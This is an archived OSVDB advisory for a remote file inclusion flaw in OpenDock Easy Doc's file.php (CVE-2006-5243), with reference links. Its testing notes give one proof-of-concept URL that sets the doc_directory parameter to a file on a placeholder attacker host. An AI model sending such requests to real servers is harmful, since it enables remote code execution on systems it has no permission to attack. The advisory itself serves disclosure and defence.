OpenDock Easy Doc sw/lib_up_file/file.php doc_directory Variable Remote File Inclusion

2006-10-09T07:19:40
ID OSVDB:29626
Type osvdb
Reporter Dedi Dwianto(the_day@echo.or.id)
Modified 2006-10-09T07:19:40

Description

Manual Testing Notes

http://[target]/[OpenDockEasyDock_Path]/sw/lib_up_file/file.php?doc_directory=http://[attacker]/inject.txt?

References:

Vendor URL: http://web.opendock.net/ Security Tracker: 1017022 Secunia Advisory ID:22334 Related OSVDB ID: 29627 Related OSVDB ID: 29632 Related OSVDB ID: 29633 Related OSVDB ID: 29628 Related OSVDB ID: 29629 Related OSVDB ID: 29625 Related OSVDB ID: 29630 Related OSVDB ID: 29631 Other Advisory URL: http://advisories.echo.or.id/adv/adv49-theday-2006.txt Mail List Post: http://archives.neohapsis.com/archives/bugtraq/2006-10/0107.html Keyword: ECHO_ADV_49$2006 ISS X-Force ID: 29404 FrSIRT Advisory: ADV-2006-3971 CVE-2006-5243 Bugtraq ID: 20407